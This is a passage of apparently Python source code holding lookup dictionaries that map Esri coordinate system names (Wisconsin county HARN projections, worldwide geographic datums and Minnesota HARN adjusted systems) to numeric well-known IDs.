'NAD_1983_HARN_Adj_WI_GreenLake_Meters': 103852, 'NAD_1983_HARN_Adj_WI_Jackson_Meters': 103853, 'NAD_1983_HARN_Adj_WI_Lafayette_Meters': 103854, 'NAD_1983_HARN_Adj_WI_Langlade_Meters': 103855, 'NAD_1983_HARN_Adj_WI_Marathon_Meters': 103856, 'NAD_1983_HARN_Adj_WI_Marquette_Meters': 103857, 'NAD_1983_HARN_Adj_WI_Monroe_Meters': 103858, 'NAD_1983_HARN_Adj_WI_Oneida_Meters': 103859, 'NAD_1983_HARN_Adj_WI_Pepin_Meters': 103860, 'NAD_1983_HARN_Adj_WI_Pierce_Meters': 103861, 'NAD_1983_HARN_Adj_WI_Portage_Meters': 103862, 'NAD_1983_HARN_Adj_WI_Richland_Meters': 103863, 'NAD_1983_HARN_Adj_WI_Sawyer_Meters': 103864, 'NAD_1983_HARN_Adj_WI_Taylor_Meters': 103865, 'NAD_1983_HARN_Adj_WI_Vernon_Meters': 103866, 'NAD_1983_HARN_Adj_WI_Vilas_Meters': 103867, 'NAD_1983_HARN_Adj_WI_Walworth_Meters': 103868, 'NAD_1983_HARN_Adj_WI_Washburn_Meters': 103869, 'NAD_1983_HARN_Adj_WI_Waushara_Meters': 103870, 'NAD_1983_HARN_Adj_WI_Wood_Meters': 103871, 'NAD_1983_HARN_Adj_WI_Adams_Feet': 103900, 'NAD_1983_HARN_Adj_WI_Ashland_Feet': 103901, 'NAD_1983_HARN_Adj_WI_Barron_Feet': 103902, 'NAD_1983_HARN_Adj_WI_Brown_Feet': 103903, 'NAD_1983_HARN_Adj_WI_Buffalo_Feet': 103904, 'NAD_1983_HARN_Adj_WI_Calumet_Feet': 103905, 'NAD_1983_HARN_Adj_WI_Clark_Feet': 103906, 'NAD_1983_HARN_Adj_WI_Dodge_Feet': 103907, 'NAD_1983_HARN_Adj_WI_Door_Feet': 103908, 'NAD_1983_HARN_Adj_WI_Douglas_Feet': 103909, 'NAD_1983_HARN_Adj_WI_Dunn_Feet': 103910, 'NAD_1983_HARN_Adj_WI_Florence_Feet': 103911, 'NAD_1983_HARN_Adj_WI_Fond_du_Lac_Feet': 103912, 'NAD_1983_HARN_Adj_WI_Forest_Feet': 103913, 'NAD_1983_HARN_Adj_WI_Grant_Feet': 103914, 'NAD_1983_HARN_Adj_WI_Iowa_Feet': 103915, 'NAD_1983_HARN_Adj_WI_Iron_Feet': 103916, 'NAD_1983_HARN_Adj_WI_Jefferson_Feet': 103917, 'NAD_1983_HARN_Adj_WI_Juneau_Feet': 103918, 'NAD_1983_HARN_Adj_WI_Kenosha_Feet': 103919, 'NAD_1983_HARN_Adj_WI_Kewaunee_Feet': 103920, 'NAD_1983_HARN_Adj_WI_LaCrosse_Feet': 103921, 'NAD_1983_HARN_Adj_WI_Lincoln_Feet': 103922, 'NAD_1983_HARN_Adj_WI_Manitowoc_Feet': 103923, 'NAD_1983_HARN_Adj_WI_Marinette_Feet': 103924, 'NAD_1983_HARN_Adj_WI_Menominee_Feet': 103925, 'NAD_1983_HARN_Adj_WI_Milwaukee_Feet': 103926, 'NAD_1983_HARN_Adj_WI_Oconto_Feet': 103927, 'NAD_1983_HARN_Adj_WI_Outagamie_Feet': 103928, 'NAD_1983_HARN_Adj_WI_Ozaukee_Feet': 103929, 'NAD_1983_HARN_Adj_WI_Polk_Feet': 103930, 'NAD_1983_HARN_Adj_WI_Price_Feet': 103931, 'NAD_1983_HARN_Adj_WI_Racine_Feet': 103932, 'NAD_1983_HARN_Adj_WI_Rock_Feet': 103933, 'NAD_1983_HARN_Adj_WI_Rusk_Feet': 103934, 'NAD_1983_HARN_Adj_WI_St_Croix_Feet': 103935, 'NAD_1983_HARN_Adj_WI_Sauk_Feet': 103936, 'NAD_1983_HARN_Adj_WI_Shawano_Feet': 103937, 'NAD_1983_HARN_Adj_WI_Sheboygan_Feet': 103938, 'NAD_1983_HARN_Adj_WI_Trempealeau_Feet': 103939, 'NAD_1983_HARN_Adj_WI_Washington_Feet': 103940, 'NAD_1983_HARN_Adj_WI_Waukesha_Feet': 103941, 'NAD_1983_HARN_Adj_WI_Waupaca_Feet': 103942, 'NAD_1983_HARN_Adj_WI_Winnebago_Feet': 103943, 'NAD_1983_HARN_Adj_WI_Bayfield_Feet': 103944, 'NAD_1983_HARN_Adj_WI_Burnett_Feet': 103945, 'NAD_1983_HARN_Adj_WI_Chippewa_Feet': 103946, 'NAD_1983_HARN_Adj_WI_Columbia_Feet': 103947, 'NAD_1983_HARN_Adj_WI_Crawford_Feet': 103948, 'NAD_1983_HARN_Adj_WI_Dane_Feet': 103949, 'NAD_1983_HARN_Adj_WI_EauClaire_Feet': 103950, 'NAD_1983_HARN_Adj_WI_Green_Feet': 103951, 'NAD_1983_HARN_Adj_WI_GreenLake_Feet': 103952, 'NAD_1983_HARN_Adj_WI_Jackson_Feet': 103953, 'NAD_1983_HARN_Adj_WI_Lafayette_Feet': 103954, 'NAD_1983_HARN_Adj_WI_Langlade_Feet': 103955, 'NAD_1983_HARN_Adj_WI_Marathon_Feet': 103956, 'NAD_1983_HARN_Adj_WI_Marquette_Feet': 103957, 'NAD_1983_HARN_Adj_WI_Monroe_Feet': 103958, 'NAD_1983_HARN_Adj_WI_Oneida_Feet': 103959, 'NAD_1983_HARN_Adj_WI_Pepin_Feet': 103960, 'NAD_1983_HARN_Adj_WI_Pierce_Feet': 103961, 'NAD_1983_HARN_Adj_WI_Portage_Feet': 103962, 'NAD_1983_HARN_Adj_WI_Richland_Feet': 103963, 'NAD_1983_HARN_Adj_WI_Sawyer_Feet': 103964, 'NAD_1983_HARN_Adj_WI_Taylor_Feet': 103965, 'NAD_1983_HARN_Adj_WI_Vernon_Feet': 103966, 'NAD_1983_HARN_Adj_WI_Vilas_Feet': 103967, 'NAD_1983_HARN_Adj_WI_Walworth_Feet': 103968, 'NAD_1983_HARN_Adj_WI_Washburn_Feet': 103969, 'NAD_1983_HARN_Adj_WI_Waushara_Feet': 103970, 'NAD_1983_HARN_Adj_WI_Wood_Feet': 103971 } class geographic(Projection): _projections = { 'GCS_Airy_1830': 4001, 'GCS_Airy_Modified': 4002, 'GCS_Australian': 4003, 'GCS_Bessel_1841': 4004, 'GCS_Bessel_Modified': 4005, 'GCS_Bessel_Namibia': 4006, 'GCS_Clarke_1858': 4007, 'GCS_Clarke_1866': 4008, 'GCS_Clarke_1866_Michigan': 4009, 'GCS_Clarke_1880_Benoit': 4010, 'GCS_Clarke_1880_IGN': 4011, 'GCS_Clarke_1880_RGS': 4012, 'GCS_Clarke_1880_Arc': 4013, 'GCS_Clarke_1880_SGA': 4014, 'GCS_Everest_Adj_1937': 4015, 'GCS_Everest_def_1967': 4016, 'GCS_Everest_Modified': 4018, 'GCS_GRS_1980': 4019, 'GCS_Helmert_1906': 4020, 'GCS_Indonesian': 4021, 'GCS_International_1924': 4022, 'GCS_International_1967': 4023, 'GCS_Krasovsky_1940': 4024, 'GCS_NWL_9D': 4025, 'GCS_Plessis_1817': 4027, 'GCS_Struve_1860': 4028, 'GCS_War_Office': 4029, 'GCS_GEM_10C': 4031, 'GCS_OSU_86F': 4032, 'GCS_OSU_91A': 4033, 'GCS_Clarke_1880': 4034, 'GCS_Sphere': 4035, 'GCS_GRS_1967': 4036, 'GCS_Everest_1830': 4042, 'GCS_Everest_def_1962': 4044, 'GCS_Everest_def_1975': 4045, 'GCS_Sphere_GRS_1980_Authalic': 4047, 'GCS_Sphere_Clarke_1866_Authalic': 4052, 'GCS_Sphere_International_1924_Authalic': 4053, 'GCS_Hughes_1980': 4054, 'GCS_Greek': 4120, 'GCS_GGRS_1987': 4121, 'GCS_ATS_1977': 4122, 'GCS_KKJ': 4123, 'GCS_RT_1990': 4124, 'GCS_Samboja': 4125, 'GCS_LKS_1994': 4126, 'GCS_Tete': 4127, 'GCS_Madzansua': 4128, 'GCS_Observatario': 4129, 'GCS_Moznet': 4130, 'GCS_Indian_1960': 4131, 'GCS_FD_1958': 4132, 'GCS_Estonia_1992': 4133, 'GCS_PDO_1993': 4134, 'GCS_Old_Hawaiian': 4135, 'GCS_St_Lawrence_Island': 4136, 'GCS_St_Paul_Island': 4137, 'GCS_St_George_Island': 4138, 'GCS_Puerto_Rico': 4139, 'GCS_North_American_1983_CSRS': 4140, 'GCS_Israel': 4141, 'GCS_Locodjo_1965': 4142, 'GCS_Abidjan_1987': 4143, 'GCS_Kalianpur_1937': 4144, 'GCS_Kalianpur_1962': 4145, 'GCS_Kalianpur_1975': 4146, 'GCS_Hanoi_1972': 4147, 'GCS_Hartebeesthoek_1994': 4148, 'GCS_CH1903': 4149, 'GCS_CH1903+': 4150, 'GCS_Swiss_TRF_1995': 4151, 'GCS_North_American_1983_HARN': 4152, 'GCS_Rassadiran': 4153, 'GCS_European_1950_ED77': 4154, 'GCS_Dabola_1981': 4155, 'GCS_S_JTSK': 4156, 'GCS_Mount_Dillon': 4157, 'GCS_Naparima_1955': 4158, 'GCS_European_Libyan_Datum_1979': 4159, 'GCS_Chos_Malal_1914': 4160, 'GCS_Pampa_del_Castillo': 4161, 'GCS_Korean_Datum_1985': 4162, 'GCS_Yemen_NGN_1996': 4163, 'GCS_South_Yemen': 4164, 'GCS_Bissau': 4165, 'GCS_Korean_Datum_1995': 4166, 'GCS_NZGD_2000': 4167, 'GCS_Accra': 4168, 'GCS_American_Samoa_1962': 4169, 'GCS_SIRGAS': 4170, 'GCS_RGF_1993': 4171, 'GCS_POSGAR': 4172, 'GCS_IRENET95': 4173, 'GCS_Sierra_Leone_1924': 4174, 'GCS_Sierra_Leone_1968': 4175, 'GCS_Australian_Antarctic_1998': 4176, 'GCS_Pulkovo_1942_Adj_1983': 4178, 'GCS_Pulkovo_1942_Adj_1958': 4179, 'GCS_Estonia_1997': 4180, 'GCS_Luxembourg_1930': 4181, 'GCS_Azores_Occidental_1939': 4182, 'GCS_Azores_Central_1948': 4183, 'GCS_Azores_Oriental_1940': 4184, 'GCS_Madeira_1936': 4185, 'GCS_OSNI_1952': 4188, 'GCS_REGVEN': 4189, 'GCS_POSGAR_1998': 4190, 'GCS_Albanian_1987': 4191, 'GCS_Douala_1948': 4192, 'GCS_Manoca_1962': 4193, 'GCS_Qornoq_1927': 4194, 'GCS_Scoresbysund_1952': 4195, 'GCS_Ammassalik_1958': 4196, 'GCS_Kousseri': 4198, 'GCS_Egypt_1930': 4199, 'GCS_Pulkovo_1995': 4200, 'GCS_Adindan': 4201, 'GCS_Australian_1966': 4202, 'GCS_Australian_1984': 4203, 'GCS_Ain_el_Abd_1970': 4204, 'GCS_Afgooye': 4205, 'GCS_Agadez': 4206, 'GCS_Lisbon': 4207, 'GCS_Aratu': 4208, 'GCS_Arc_1950': 4209, 'GCS_Arc_1960': 4210, 'GCS_Batavia': 4211, 'GCS_Barbados_1938': 4212, 'GCS_Beduaram': 4213, 'GCS_Beijing_1954': 4214, 'GCS_Belge_1950': 4215, 'GCS_Bermuda_1957': 4216, 'GCS_Bern_1898': 4217, 'GCS_Bogota': 4218, 'GCS_Bukit_Rimpah': 4219, 'GCS_Camacupa': 4220, 'GCS_Campo_Inchauspe': 4221, 'GCS_Cape': 4222, 'GCS_Carthage': 4223, 'GCS_Chua': 4224, 'GCS_Corrego_Alegre': 4225, 'GCS_Cote_d_Ivoire': 4226, 'GCS_Deir_ez_Zor': 4227, 'GCS_Douala': 4228, 'GCS_Egypt_1907': 4229, 'GCS_European_1950': 4230, 'GCS_European_1987': 4231, 'GCS_Fahud': 4232, 'GCS_Gandajika_1970': 4233, 'GCS_Garoua': 4234, 'GCS_Guyane_Francaise': 4235, 'GCS_Hu_Tzu_Shan': 4236, 'GCS_Hungarian_1972': 4237, 'GCS_Indonesian_1974': 4238, 'GCS_Indian_1954': 4239, 'GCS_Indian_1975': 4240, 'GCS_Jamaica_1875': 4241, 'GCS_Jamaica_1969': 4242, 'GCS_Kalianpur_1880': 4243, 'GCS_Kandawala': 4244, 'GCS_Kertau': 4245, 'GCS_Kuwait_Oil_Company': 4246, 'GCS_La_Canoa': 4247, 'GCS_Provisional_S_American_1956': 4248, 'GCS_Lake': 4249, 'GCS_Leigon': 4250, 'GCS_Liberia_1964': 4251, 'GCS_Lome': 4252, 'GCS_Luzon_1911': 4253, 'GCS_Hito_XVIII_1963': 4254, 'GCS_Herat_North': 4255, 'GCS_Mahe_1971': 4256, 'GCS_Makassar': 4257, 'GCS_ETRS_1989': 4258, 'GCS_Malongo_1987': 4259, 'GCS_Manoca': 4260, 'GCS_Merchich': 4261, 'GCS_Massawa': 4262, 'GCS_Minna': 4263, 'GCS_Mhast': 4264, 'GCS_Monte_Mario': 4265, 'GCS_Mporaloko': 4266, 'GCS_North_American_1927': 4267, 'GCS_North_American_Michigan': 4268, 'GCS_North_American_1983': 4269, 'GCS_Nahrwan_1967': 4270, 'GCS_Naparima_1972': 4271, 'GCS_New_Zealand_1949': 4272, 'GCS_NGO_1948': 4273, 'GCS_Datum_73': 4274, 'GCS_NTF': 4275, 'GCS_NSWC_9Z_2': 4276, 'GCS_OSGB_1936': 4277, 'GCS_OSGB_1970_SN': 4278, 'GCS_OS_SN_1980': 4279, 'GCS_Padang_1884': 4280, 'GCS_Palestine_1923': 4281, 'GCS_Pointe_Noire': 4282, 'GCS_GDA_1994': 4283, 'GCS_Pulkovo_1942': 4284, 'GCS_Qatar_1974': 4285, 'GCS_Qatar_1948': 4286, 'GCS_Qornoq': 4287, 'GCS_Loma_Quintana': 4288, 'GCS_Amersfoort': 4289, 'GCS_South_American_1969': 4291, 'GCS_Sapper_Hill_1943': 4292, 'GCS_Schwarzeck': 4293, 'GCS_Segora': 4294, 'GCS_Serindung': 4295, 'GCS_Sudan': 4296, 'GCS_Tananarive_1925': 4297, 'GCS_Timbalai_1948': 4298, 'GCS_TM65': 4299, 'GCS_TM75': 4300, 'GCS_Tokyo': 4301, 'GCS_Trinidad_1903': 4302, 'GCS_Trucial_Coast_1948': 4303, 'GCS_Voirol_1875': 4304, 'GCS_Voirol_Unifie_1960': 4305, 'GCS_Bern_1938': 4306, 'GCS_Nord_Sahara_1959': 4307, 'GCS_RT38': 4308, 'GCS_Yacare': 4309, 'GCS_Yoff': 4310, 'GCS_Zanderij': 4311, 'GCS_MGI': 4312, 'GCS_Belge_1972': 4313, 'GCS_Deutsches_Hauptdreiecksnetz': 4314, 'GCS_Conakry_1905': 4315, 'GCS_Dealul_Piscului_1933': 4316, 'GCS_Dealul_Piscului_1970': 4317, 'GCS_NGN': 4318, 'GCS_KUDAMS': 4319, 'GCS_WGS_1972': 4322, 'GCS_WGS_1972_BE': 4324, 'GCS_WGS_1984': 4326, 'GCS_Montserrat_1958': 4404, 'GCS_Anguilla_1957': 4600, 'GCS_Antigua_1943': 4601, 'GCS_Dominica_1945': 4602, 'GCS_Grenada_1953': 4603, 'GCS_St_Kitts_1955': 4605, 'GCS_St_Lucia_1955': 4606, 'GCS_St_Vincent_1945': 4607, 'GCS_NAD_1927_Definition_1976': 4608, 'GCS_NAD_1927_CGQ77': 4609, 'GCS_Xian_1980': 4610, 'GCS_Hong_Kong_1980': 4611, 'GCS_JGD_2000': 4612, 'GCS_Gunung_Segara': 4613, 'GCS_QND_1995': 4614, 'GCS_Porto_Santo_1936': 4615, 'GCS_Selvagem_Grande_1938': 4616, 'GCS_North_American_1983_CSRS': 4617, 'GCS_South_American_1969': 4618, 'GCS_SWEREF99': 4619, 'GCS_Point_58': 4620, 'GCS_Fort_Marigot': 4621, 'GCS_Sainte_Anne': 4622, 'GCS_CSG_1967': 4623, 'GCS_RGFG_1995': 4624, 'GCS_Fort_Desaix': 4625, 'GCS_Reunion_1947': 4626, 'GCS_RGR_1992': 4627, 'GCS_Tahiti_1952': 4628, 'GCS_Tahaa_1954': 4629, 'GCS_IGN72_Nuku_Hiva': 4630, 'GCS_K0_1949': 4631, 'GCS_Combani_1950': 4632, 'GCS_IGN56_Lifou': 4633, 'GCS_Petrels_1972': 4636, 'GCS_Pointe_Geologie_Perroud_1950': 4637, 'GCS_Saint_Pierre_et_Miquelon_1950': 4638, 'GCS_MOP78': 4639, 'GCS_RRAF_1991': 4640, 'GCS_IGN53_Mare': 4641, 'GCS_ST84_Ile_des_Pins': 4642, 'GCS_ST71_Belep': 4643, 'GCS_NEA74_Noumea': 4644, 'GCS_RGNC_1991': 4645, 'GCS_Grand_Comoros': 4646, 'GCS_Reykjavik_1900': 4657, 'GCS_Hjorsey_1955': 4658, 'GCS_ISN_1993': 4659, 'GCS_Helle_1954': 4660, 'GCS_LKS_1992': 4661, 'GCS_IGN72_Grande_Terre': 4662, 'GCS_Porto_Santo_1995': 4663, 'GCS_Azores_Oriental_1995': 4664, 'GCS_Azores_Central_1995': 4665, 'GCS_Lisbon_1890': 4666, 'GCS_IKBD_1992': 4667, 'GCS_European_1979': 4668, 'GCS_LKS_1994': 4669, 'GCS_IGM_1995': 4670, 'GCS_Voirol_1879': 4671, 'GCS_Chatham_Island_1971': 4672, 'GCS_Chatham_Islands_1979': 4673, 'GCS_SIRGAS_2000': 4674, 'GCS_Guam_1963': 4675, 'GCS_Vientiane_1982': 4676, 'GCS_Lao_1993': 4677, 'GCS_Lao_1997': 4678, 'GCS_Jouik_1961': 4679, 'GCS_Nouakchott_1965': 4680, 'GCS_Gulshan_303': 4682, 'GCS_PRS_1992': 4683, 'GCS_Gan_1970': 4684, 'GCS_MAGNA': 4686, 'GCS_RGPF': 4687, 'GCS_Fatu_Iva_1972': 4688, 'GCS_IGN63_Hiva_Oa': 4689, 'GCS_Tahiti_1979': 4690, 'GCS_Moorea_1987': 4691, 'GCS_Maupiti_1983': 4692, 'GCS_Nakhl-e_Ghanem': 4693, 'GCS_POSGAR_1994': 4694, 'GCS_Katanga_1955': 4695, 'GCS_Kasai_1955': 4696, 'GCS_IGC_1962_6th_Parallel_South': 4697, 'GCS_Kerguelen_Island_1949': 4698, 'GCS_Le_Pouce_1934': 4699, 'GCS_IGN_Astro_1960': 4700, 'GCS_IGCB_1955': 4701, 'GCS_Mauritania_1999': 4702, 'GCS_Mhast_1951': 4703, 'GCS_Mhast_Onshore': 4704, 'GCS_Mhast_Offshore': 4705, 'GCS_Egypt_Gulf_of_Suez_S-650_TL': 4706, 'GCS_Tern_Island_1961': 4707, 'GCS_Anna_1_1965': 4708, 'GCS_Beacon_E_1945': 4709, 'GCS_DOS_71_4': 4710, 'GCS_Astro_1952': 4711, 'GCS_Ascension_Island_1958': 4712, 'GCS_Ayabelle': 4713, 'GCS_Bellevue_IGN': 4714, 'GCS_Camp_Area': 4715, 'GCS_Canton_1966': 4716, 'GCS_Cape_Canaveral': 4717, 'GCS_Solomon_1968': 4718, 'GCS_Easter_Island_1967': 4719, 'GCS_Fiji_1986': 4720, 'GCS_Fiji_1956': 4721, 'GCS_ISTS_061_1968': 4722, 'GCS_Grand_Cayman_1959': 4723, 'GCS_ISTS_073_1969': 4724, 'GCS_Johnston_Island_1961': 4725, 'GCS_Little_Cayman_1961': 4726, 'GCS_Midway_1961': 4727, 'GCS_Pico_de_Las_Nieves': 4728, 'GCS_Pitcairn_1967': 4729, 'GCS_Santo_DOS_1965': 4730, 'GCS_Viti_Levu_1916': 4731, 'GCS_Wake_Eniwetok_1960': 4732, 'GCS_Wake_Island_1952': 4733, 'GCS_Tristan_1968': 4734, 'GCS_Kusaie_1951': 4735, 'GCS_Deception_Island': 4736, 'GCS_Korea_2000': 4737, 'GCS_Hong_Kong_1963': 4738, 'GCS_Hong_Kong_1963_67': 4739, 'GCS_PZ_1990': 4740, 'GCS_FD_1954': 4741, 'GCS_GDM_2000': 4742, 'GCS_Karbala_1979_Polservice': 4743, 'GCS_Nahrwan_1934': 4744, 'GCS_RD/83': 4745, 'GCS_PD/83': 4746, 'GCS_Greenland_1996': 4747, 'GCS_Vanua_Levu_1915': 4748, 'GCS_RGNC_1991-93': 4749, 'GCS_ST87_Ouvea': 4750, 'GCS_fk89': 4753, 'GCS_LGD2006': 4754, 'GCS_DGN_1995': 4755, 'GCS_VN_2000': 4756, 'GCS_SVY21': 4757, 'GCS_JAD_2001': 4758, 'GCS_NAD_1983_NSRS2007': 4759, 'GCS_WGS_1966': 4760, 'GCS_Bern_1898_Bern': 4801, 'GCS_Bogota_Bogota': 4802, 'GCS_Lisbon_Lisbon': 4803, 'GCS_Makassar_Jakarta': 4804, 'GCS_MGI_Ferro': 4805, 'GCS_Monte_Mario_Rome': 4806, 'GCS_NTF_Paris': 4807, 'GCS_Padang_1884_Jakarta': 4808, 'GCS_Belge_1950_Brussels': 4809, 'GCS_Tananarive_1925_Paris': 4810, 'GCS_Voirol_1875_Paris': 4811, 'GCS_Voirol_Unifie_1960_Paris': 4812, 'GCS_Batavia_Jakarta': 4813, 'GCS_RT38_Stockholm': 4814, 'GCS_Greek_Athens': 4815, 'GCS_Carthage_Paris': 4816, 'GCS_NGO_1948_Oslo': 4817, 'GCS_S_JTSK_Ferro': 4818, 'GCS_Nord_Sahara_1959_Paris': 4819, 'GCS_Gunung_Segara_Jakarta': 4820, 'GCS_Voirol_1879_Paris': 4821, 'GCS_ITRF_2005': 4896, 'GCS_ATF_Paris': 4901, 'GCS_Nord_de_Guerre_Paris': 4902, 'GCS_Madrid_1870_Madrid': 4903, 'GCS_Lisbon_1890_Lisbon': 4904, 'GCS_WGS_1966': 37001, 'GCS_Fischer_1960': 37002, 'GCS_Fischer_1968': 37003, 'GCS_Fischer_Modified': 37004, 'GCS_Hough_1960': 37005, 'GCS_Everest_Modified_1969': 37006, 'GCS_Walbeck': 37007, 'GCS_Sphere_ARC_INFO': 37008, 'GCS_European_1979': 37201, 'GCS_Everest_Bangladesh': 37202, 'GCS_Everest_India_Nepal': 37203, 'GCS_Hjorsey_1955': 37204, 'GCS_Hong_Kong_1963_67': 37205, 'GCS_Oman': 37206, 'GCS_South_Asia_Singapore': 37207, 'GCS_Ayabelle': 37208, 'GCS_Point_58': 37211, 'GCS_Beacon_E_1945': 37212, 'GCS_Tern_Island_1961': 37213, 'GCS_Astro_1952': 37214, 'GCS_Bellevue_IGN': 37215, 'GCS_Canton_1966': 37216, 'GCS_Chatham_Island_1971': 37217, 'GCS_DOS_1968': 37218, 'GCS_Easter_Island_1967': 37219, 'GCS_Guam_1963': 37220, 'GCS_GUX_1': 37221, 'GCS_Johnston_Island_1961': 37222, 'GCS_Carthage_Degree': 37223, 'GCS_Midway_1961': 37224, 'GCS_Pitcairn_1967': 37226, 'GCS_Santo_DOS_1965': 37227, 'GCS_Viti_Levu_1916': 37228, 'GCS_Wake_Eniwetok_1960': 37229, 'GCS_Wake_Island_1952': 37230, 'GCS_Anna_1_1965': 37231, 'GCS_Gan_1970': 37232, 'GCS_ISTS_073_1969': 37233, 'GCS_Kerguelen_Island_1949': 37234, 'GCS_Reunion_1947': 37235, 'GCS_Ascension_Island_1958': 37237, 'GCS_DOS_71_4': 37238, 'GCS_Cape_Canaveral': 37239, 'GCS_Fort_Thomas_1955': 37240, 'GCS_Graciosa_Base_SW_1948': 37241, 'GCS_ISTS_061_1968': 37242, 'GCS_LC5_1961': 37243, 'GCS_Observ_Meteorologico_1939': 37245, 'GCS_Pico_de_Las_Nieves': 37246, 'GCS_Porto_Santo_1936': 37247, 'GCS_Sao_Braz': 37249, 'GCS_Selvagem_Grande_1938': 37250, 'GCS_Tristan_1968': 37251, 'GCS_American_Samoa_1962': 37252, 'GCS_Camp_Area': 37253, 'GCS_Deception_Island': 37254, 'GCS_Gunung_Segara': 37255, 'GCS_S42_Hungary': 37257, 'GCS_Kusaie_1951': 37259, 'GCS_Alaskan_Islands': 37260, 'GCS_Assumed_Geographic_1': 104000, 'GCS_Estonia_1937': 104101, 'GCS_Hermannskogel': 104102, 'GCS_Sierra_Leone_1960': 104103, 'GCS_Hong_Kong_1980': 104104, 'GCS_Datum_Lisboa_Bessel': 104105, 'GCS_Datum_Lisboa_Hayford': 104106, 'GCS_RGF_1993': 104107, 'GCS_NZGD_2000': 104108, 'GCS_Pohnpei': 104109, 'GCS_REGVEN': 104110, 'GCS_JGD_2000': 104111, 'GCS_Bab_South': 104112, 'GCS_Majuro': 104113, 'GCS_Bermuda_2000': 104114, 'GCS_ITRF_1988': 104115, 'GCS_ITRF_1989': 104116, 'GCS_ITRF_1990': 104117, 'GCS_ITRF_1991': 104118, 'GCS_ITRF_1992': 104119, 'GCS_ITRF_1993': 104120, 'GCS_ITRF_1994': 104121, 'GCS_ITRF_1996': 104122, 'GCS_ITRF_1997': 104123, 'GCS_ITRF_2000': 104124, 'GCS_Chatham_Islands_1979': 104125, 'GCS_Observatorio_Meteorologico_1965': 104126, 'GCS_Roma_1940': 104127, 'GCS_Sphere_EMEP': 104128, 'GCS_EUREF_FIN': 104129, 'GCS_Jordan': 104130, 'GCS_D48': 104131, 'GCS_Ocotepeque_1935': 104132, 'GCS_JAD_2001': 104133, 'GCS_MONREF_1997': 104134, 'GCS_MSK_1942': 104135, 'GCS_TWD_1967': 104136, 'GCS_TWD_1997': 104137, 'GCS_WGS_1984_Major_Auxiliary_Sphere': 104199, 'GCS_ETRF_1989': 104258, 'GCS_Merchich_Degree': 104261, 'GCS_Voirol_1875_Degree': 104304, 'GCS_Voirol_Unifie_1960_Degree': 104305, 'GCS_NAD_1983_HARN_Adj_MN_Anoka': 104700, 'GCS_NAD_1983_HARN_Adj_MN_Becker': 104701, 'GCS_NAD_1983_HARN_Adj_MN_Beltrami_North': 104702, 'GCS_NAD_1983_HARN_Adj_MN_Beltrami_South': 104703, 'GCS_NAD_1983_HARN_Adj_MN_Benton': 104704, 'GCS_NAD_1983_HARN_Adj_MN_Big_Stone': 104705, 'GCS_NAD_1983_HARN_Adj_MN_Blue_Earth': 104706, 'GCS_NAD_1983_HARN_Adj_MN_Brown': 104707, 'GCS_NAD_1983_HARN_Adj_MN_Carlton': 104708, 'GCS_NAD_1983_HARN_Adj_MN_Carver': 104709, 'GCS_NAD_1983_HARN_Adj_MN_Cass_North': 104710, 'GCS_NAD_1983_HARN_Adj_MN_Cass_South': 104711, 'GCS_NAD_1983_HARN_Adj_MN_Chippewa': 104712, 'GCS_NAD_1983_HARN_Adj_MN_Chisago': 104713, 'GCS_NAD_1983_HARN_Adj_MN_Cook_North': 104714, 'GCS_NAD_1983_HARN_Adj_MN_Cook_South': 104715, 'GCS_NAD_1983_HARN_Adj_MN_Cottonwood': 104716, 'GCS_NAD_1983_HARN_Adj_MN_Crow_Wing': 104717, 'GCS_NAD_1983_HARN_Adj_MN_Dakota': 104718, 'GCS_NAD_1983_HARN_Adj_MN_Dodge': 104719, 'GCS_NAD_1983_HARN_Adj_MN_Douglas': 104720, 'GCS_NAD_1983_HARN_Adj_MN_Faribault': 104721, 'GCS_NAD_1983_HARN_Adj_MN_Fillmore': 104722, 'GCS_NAD_1983_HARN_Adj_MN_Freeborn': 104723, 'GCS_NAD_1983_HARN_Adj_MN_Goodhue': 104724, 'GCS_NAD_1983_HARN_Adj_MN_Grant': 104725, 'GCS_NAD_1983_HARN_Adj_MN_Hennepin': 104726, 'GCS_NAD_1983_HARN_Adj_MN_Houston': 104727, 'GCS_NAD_1983_HARN_Adj_MN_Isanti': 104728, 'GCS_NAD_1983_HARN_Adj_MN_Itasca_North': 104729, 'GCS_NAD_1983_HARN_Adj_MN_Itasca_South': 104730, 'GCS_NAD_1983_HARN_Adj_MN_Jackson': 104731, 'GCS_NAD_1983_HARN_Adj_MN_Kanabec': 104732, 'GCS_NAD_1983_HARN_Adj_MN_Kandiyohi': 104733, 'GCS_NAD_1983_HARN_Adj_MN_Kittson': 104734, 'GCS_NAD_1983_HARN_Adj_MN_Koochiching': 104735, 'GCS_NAD_1983_HARN_Adj_MN_Lac_Qui_Parle': 104736, 'GCS_NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North': 104737, 'GCS_NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South': 104738, 'GCS_NAD_1983_HARN_Adj_MN_Le_Sueur': 104739, 'GCS_NAD_1983_HARN_Adj_MN_Lincoln': 104740, 'GCS_NAD_1983_HARN_Adj_MN_Lyon': 104741, 'GCS_NAD_1983_HARN_Adj_MN_McLeod': 104742, 'GCS_NAD_1983_HARN_Adj_MN_Mahnomen': 104743, 'GCS_NAD_1983_HARN_Adj_MN_Marshall': 104744, 'GCS_NAD_1983_HARN_Adj_MN_Martin': 104745, 'GCS_NAD_1983_HARN_Adj_MN_Meeker': 104746, 'GCS_NAD_1983_HARN_Adj_MN_Morrison': 104747, 'GCS_NAD_1983_HARN_Adj_MN_Mower': 104748, 'GCS_NAD_1983_HARN_Adj_MN_Murray': 104749, 'GCS_NAD_1983_HARN_Adj_MN_Nicollet': 104750, 'GCS_NAD_1983_HARN_Adj_MN_Nobles': 104751, 'GCS_NAD_1983_HARN_Adj_MN_Norman': 104752, 'GCS_NAD_1983_HARN_Adj_MN_Olmsted': 104753, 'GCS_NAD_1983_HARN_Adj_MN_Ottertail': 104754, 'GCS_NAD_1983_HARN_Adj_MN_Pennington': 104755, 'GCS_NAD_1983_HARN_Adj_MN_Pine': 104756, 'GCS_NAD_1983_HARN_Adj_MN_Pipestone': 104757, 'GCS_NAD_1983_HARN_Adj_MN_Polk': 104758, 'GCS_NAD_1983_HARN_Adj_MN_Pope': 104759, 'GCS_NAD_1983_HARN_Adj_MN_Ramsey': 104760, 'GCS_NAD_1983_HARN_Adj_MN_Red_Lake': 104761, 'GCS_NAD_1983_HARN_Adj_MN_Redwood': 104762, 'GCS_NAD_1983_HARN_Adj_MN_Renville': 104763, 'GCS_NAD_1983_HARN_Adj_MN_Rice': 104764, 'GCS_NAD_1983_HARN_Adj_MN_Rock': 104765, 'GCS_NAD_1983_HARN_Adj_MN_Roseau': 104766, 